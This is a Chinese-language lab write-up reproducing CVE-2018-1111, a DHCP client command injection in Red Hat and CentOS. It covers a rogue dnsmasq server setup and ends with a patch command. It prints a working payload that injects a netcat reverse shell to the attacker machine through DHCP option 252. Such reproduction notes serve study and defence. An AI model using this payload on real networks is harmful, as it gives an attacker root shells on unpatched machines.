DHCP命令執行_CVE-2018-1111漏洞復現
一、漏洞描述
在Red Hat Enterprise Linux多個版本的DHCP客戶端軟件包所包含的NetworkManager集成腳本中發現了命令注入漏洞,攻擊者可以通過本地網絡上的惡意DHCP服務器或者使用惡意的虛假DHCP響應來利用此漏洞進行攻擊,一旦攻擊成功,則可以在配置了DHCP的NetworkManager的系統上以root權限執行任意命令。
二、漏洞影響版本
Red hat 6.x、7.x
Centos 6.x、7.x
三、漏洞復現環境搭建
測試環境:攻擊機:kali 目標機(靶機):centos7
- 配置虛擬網絡,設置僅主機模式、關閉dhcp
- 將攻擊機和靶機網絡配置成僅主機模式
3.kali(攻擊機)搭建dhcp服務
3.1先在kali下設置網絡(配置ip和網關)
3.2在當前目錄新建一個dnsmasq.conf文件,寫入以下內容進行配置:
bind-interfaces interface=eth0 except-interface=lo dhcp-range=192.168.2.20,192.168.2.30,12h #dhcp-range:表示要分配給客戶機的ip地址范圍和租約時間 dhcp-option=3,192.168.2.11 #dhcp-option 表示指定給DHCP客戶端的選項信息,3:表示設置網關地址選項 dhcp-option=6,192.168.2.11 #6:表示設置DNS服務器地址選項 log-queries log-facility=/var/log/dnsmasq.log #表示日志記錄器
4.漏洞利用payload
dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash 192.168.2.11 8888 #"
252:表示為DHCP客戶端提供了一個用於配置其代理設置的url, wpad-proxy-url
payload 中涉及到的 option 252 是私人使用保留部分的一部分, 為 dhcp 服務器使用 252,然后在他們的瀏覽器中寫入與 dhcp 服務器交談的能力,並要求代碼 252 從該選項列出的 URL 中獲取關於網絡上代理設置的信息
5.kali開啟監聽
6.centos(靶機)重啟網絡服務,kali接收到反彈shell
四、漏洞防御
更新dhcp
yum -y update dhclient